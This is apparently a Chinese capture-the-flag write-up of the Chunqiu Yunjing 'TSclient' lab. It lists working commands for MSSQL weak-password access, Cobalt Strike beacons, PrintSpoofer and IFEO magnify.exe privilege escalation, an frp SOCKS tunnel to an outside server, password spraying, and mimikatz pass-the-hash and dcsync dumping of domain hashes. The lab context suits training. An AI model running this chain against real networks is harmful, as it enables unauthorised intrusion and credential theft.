春秋云镜 TSclient

# 前言：

很久之前就发现了春秋云镜这个 yyds 平台，霄壤实验室的，内网练习好靶场，但是由于经费紧张，就很长时间没碰了，最近参加比赛成绩比较好，实验室老师给了我们一笔资金来学习，就买了一些沙砾，开始兴奋起来了！直接开始。

# Rustscan 扫描

命令

rustscan.exe -u 10000 -a 39.101.131.233

发现 1433 mssql 开放

# fscan 扫描

命令

fscan.exe -h 39.101.131.233

扫描出了 mssql 弱口令 sa 1qaz!QAZ

# Multiple Database Utilization (数据库)

直接右键添加 mssql 数据库

1qaz!QAZ

# shell1

成功拿到第一个 shell

# CS 派生

直接创建监听器，然后生成 exe 木马，通过数据库上传到 windows

直接运行 exe 文件，发现 cs 已经上线

# WIN-WEB 提权

# PrintSpoofer.exe 提权 (system)

命令：

shell C:\\Users\\Public\\PrintSpoofer64.exe -i -c  "C:\\Users\\Public\\artifact_x64.exe"

PrintSpoofer64.exe 是 system 权限，所以直接用 PrintSpoofer64.exe 运行木马就可以上线 cs 了

# flag01

打开 system 权限的 beacon

shell type C:\Users\Administrator\flag\flag01.txt

# 横向移动

# 抓取 hash 和查看用户 (john)

发现 john 用户，直接查看该用户进程 WIN-WEB/john，上线 john

成功上线 John

cs 打开 john 用户 shell 交互界面，执行 shell net use 查询 john 用户挂载情况

shell net use

发现 C 盘下面有东西

dir \\TSCLIENT\C 查看文件

查看文件，发现账号密码

shell type \\tsclient\c\credential.txt

ipconfig 查看机器 ip

传入 fscan 扫描内网

# 消除端口占用

netstat -tulpn | grep 8006(被占用的端口)
显示pid

kill -9 pid

# frp 内网穿透

frps.toml (服务端启动)

bindPort = 7777

frpc.toml (客户端启动)

serverAddr = "117.50.196.44"
serverPort = 7777

[[proxies]]
name = "socks5"
type = "tcp"
remotePort = 8888
[proxies.plugin]
type = "socks5"

注意：serverAddr 必须为服务器 ip
傻逼了，搭隧道用了一个多小时
proxychain 直接扫隧道就行了，服务器要出网

shell C:\Users\Public\frpc.exe -c C:\Users\Public\frpc.toml

隧道搭建成功

# CS socks 转发

socks 1080

vim /etc/proxychains4.conf

然后修改 proxychain 的配置文件，改为对应 1080

# Proxychain 密码喷洒

隧道搭建以后，kali 可以访问内网，然后密码喷洒

proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

上图提示 failure 是队友改了密码
发现提示密码过期使用 smbpasswd 进行修改密码

proxychains -q python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'bpbpbp'

注意：其中 Ald@rLMWuy7Z!# 是密码，打靶场时，被队友改了我不清楚，照抄就改不了，要修改密码为已经改的

# SocksCap64 本地代理

#### 附加进程
右键程序，选择附加进程
将代理附加到远程桌面进程

链接成功

# 映像劫持 (获取 system)

根据之前的提示映像劫持提权

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

发现 NT AUTHORITY \Authenticated Users 可以修改注册表
即所有账号密码登录的用户都可以修改注册表，利用这个性质，修改注册表，使用放大镜进行提权

修改注册表映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

锁定电脑，右下角点击放大镜，获取 system 权限

# 正向木马链接

因为不出网，生成正向链接木马

cmd 运行木马成功上线

# flag02

shell type C:\Users\Administrator\flag\flag02.txt

shell net group "domain admins" /domain
发现win2016$在域管组里，即机器账户可以Hash传递登录域控。

# mimikatz

利用 mimikatz 注入机器账户的 hash

shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b47c845655f06fb51ede6767aabbb33f" "exit"

利用 mimikatz dcsync dump 域控 hash

shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab  /user:Administrator" "exit"

利用 mimikatz dcsync dump 域控 hash

shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

# Hash 传递登录域控

proxychains python3 smbexec.py -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 administrator@172.22.8.15

# flag03

# 总结构

# 参考：

狗 and 猫 师傅
https://fushuling.com/